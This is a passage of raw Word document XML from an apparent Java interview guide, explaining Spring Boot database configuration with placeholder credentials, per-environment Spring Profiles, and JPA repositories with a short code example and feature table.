      <w:bookmarkEnd w:id="622"/>
    </w:p>
    <w:p w14:paraId="7EB79E9B" w14:textId="2BC90681" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969"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 a Spring Boot application, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>database details</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are typically configured in the application.properties or application.yml file, located in the src/main/resources directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654CA11C" w14:textId="77777777" w:rsidR="00970969"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2E7C4B4">
          <v:rect id="_x0000_i2617" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CD924D"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Example using application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347279BA"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Database URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B4A1AC"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rl=jdbc:mysql://localhost:3306/mydatabase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB19CC" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1109B0E8"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Database credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD46942"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sername=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED6CC8F"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password=yourpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71728401" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513F1672"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JDBC driver (optional if Spring Boot auto-detects)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4CE575"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driver-class-name=com.mysql.cj.jdbc.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0BB5BD" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3547CD6E"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JPA / Hibernate settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA0D087"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jpa.hibernate.ddl-auto=update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6C7D2C"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jpa.show-sql=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0AC851"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jpa.properties.hibernate.dialect=org.hibernate.dialect.MySQL8Dialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB3A244" w14:textId="77777777" w:rsidR="00970969"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071FDF1">
          <v:rect id="_x0000_i2618" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6564F88C"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Example using application.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9FF7C9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF1CD8F"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datasource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5367C462"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url: jdbc:mysql://localhost:3306/mydatabase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE5D0D9"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username: root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6189E83A"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assword: yourpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029ED948"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driver-class-name: com.mysql.cj.jdbc.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23025B53" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C765387"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jpa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526F1A63"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hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B543896"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ddl-auto: update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390B8632"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 xml:space="preserve">    show-sql: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A27EC62"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operties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A41244"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hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095D8A0E"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dialect: org.hibernate.dialect.MySQL8Dialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6485FC46" w14:textId="77777777" w:rsidR="00970969"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027C425">
          <v:rect id="_x0000_i2619" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="032BE452" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969"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Note on Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E2DDED"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Never hard-code sensitive credentials like database usernames and passwords in production. Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B68B986"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vironment variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA20DCA"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 Cloud Config Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F7DC7E" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="0097096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crypted secrets management (Vault, AWS Secrets Manager, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D2AD02" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0097096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09C7EC2">
          <v:rect id="_x0000_i2620" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C399F19" w14:textId="1F4DDF6A" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="623" w:name="_Toc196308103"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will you give database details for the individual environment</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="623"/>
    </w:p>
    <w:p w14:paraId="09AB6E9B" w14:textId="181AA5D6" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E70325"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To provide </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>database details per environment</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a Spring Boot application, use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Profiles</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> along with separate application-{profile}.properties or application-{profile}.yml files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BED34E" w14:textId="77777777" w:rsidR="00E7032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05AF9C4">
          <v:rect id="_x0000_i2621" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BD0426" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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Step-by-step Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0554CAC0" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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Create profile-specific config files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F2C9EB" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D390F9E" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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pplication-dev.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3118F2AC" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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pplication-test.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252274E5" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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pplication-prod.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EB48D0" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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ach file contains DB config specific to that environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E552251" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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pplication-dev.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43122D3B" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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rl=jdbc:mysql://localhost:3306/dev_db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5E05EE" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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sername=dev_user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5116389A" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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password=dev_pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C864E2D" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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pplication-prod.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2771F335" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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rl=jdbc:mysql://prod-server:3306/prod_db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598C1071" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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sername=prod_user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5FB73C" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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password=prod_pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C056020" w14:textId="77777777" w:rsidR="00E7032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D2CC9C3">
          <v:rect id="_x0000_i2622" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="454571AF" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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Set active profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14271A0C" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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activate the profile in several ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1EFF2C" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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 In application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F301965" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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profiles.active=dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634B0C6F" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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B. As a command-line argument:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5128E8DF" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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java -jar app.jar --spring.profiles.active=prod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297A9817" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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 As an environment variable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F298577" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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port SPRING_PROFILES_ACTIVE=dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F221A3" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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 In IDE (e.g., IntelliJ Run Config):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22014A46" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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Dspring.profiles.active=test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268B3407" w14:textId="77777777" w:rsidR="00E7032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A453DE4">
          <v:rect id="_x0000_i2623" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4557A6CB" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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Default application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA680B4" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="002C6305" w:rsidRDefault="00E7032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e application.properties (or .yml) for common/shared settings across all environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A453C1" w14:textId="77777777" w:rsidR="00E70325" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E7032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D643E00">
          <v:rect id="_x0000_i2624" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="359FE103" w14:textId="14F62316" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="624" w:name="_Toc196308104"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a JPA repository</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="624"/>
    </w:p>
    <w:p w14:paraId="7A2D7147" w14:textId="752578EA" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E9"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA Repository</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a part of </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that provides a simplified way to implement data access layers using the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Persistence API (JPA)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5FAEB6" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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t is an interface that extends PagingAndSortingRepository and CrudRepository, providing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBE4C5E" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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Basic CRUD operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48847A3B" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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agination and sorting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D51F93C" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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ustom query methods (by method name or using @Query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD3376E" w14:textId="77777777" w:rsidR="00F202E9"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0C21D3C">
          <v:rect id="_x0000_i2625" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E025F7C" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E9"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Syntax Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1600DF" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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public interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332C4959" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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ist&lt;Employee&gt; findByDepartment(String department);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4506A91C" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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2B925F7B" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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Query("SELECT e FROM Employee e WHERE e.salary &gt; :minSalary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2965B007" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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ist&lt;Employee&gt; findHighEarners(@Param("minSalary") double minSalary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1EB4D1" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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E0B7936" w14:textId="77777777" w:rsidR="00F202E9"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1E829DD">
          <v:rect id="_x0000_i2626" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7935EACD" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E9"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Key Featur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9"/>
        <w:gridCol w:w="5484"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="7DFF4FA4" w14:textId="77777777" w:rsidTr="00F202E9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="247DA0AD" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0289DD66" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="2A449AEE" w14:textId="77777777" w:rsidTr="00F202E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="469F529F" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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RUD Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69317AE5" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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ave(), findById(), findAll(), deleteById() etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="3CBAEDA9" w14:textId="77777777" w:rsidTr="00F202E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24F859FB" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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Query Derivation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66A0AA87" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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Method names like findByName() auto-generate queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="1C993BA8" w14:textId="77777777" w:rsidTr="00F202E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A3C4675" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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ustom Queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2567DD15" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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e JPQL/SQL with @Query annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="4CB7D345" w14:textId="77777777" w:rsidTr="00F202E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D926B61" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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aging and Sorting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="352E4FCA" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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mes from PagingAndSortingRepository</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="1128418E" w14:textId="77777777" w:rsidTr="00F202E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
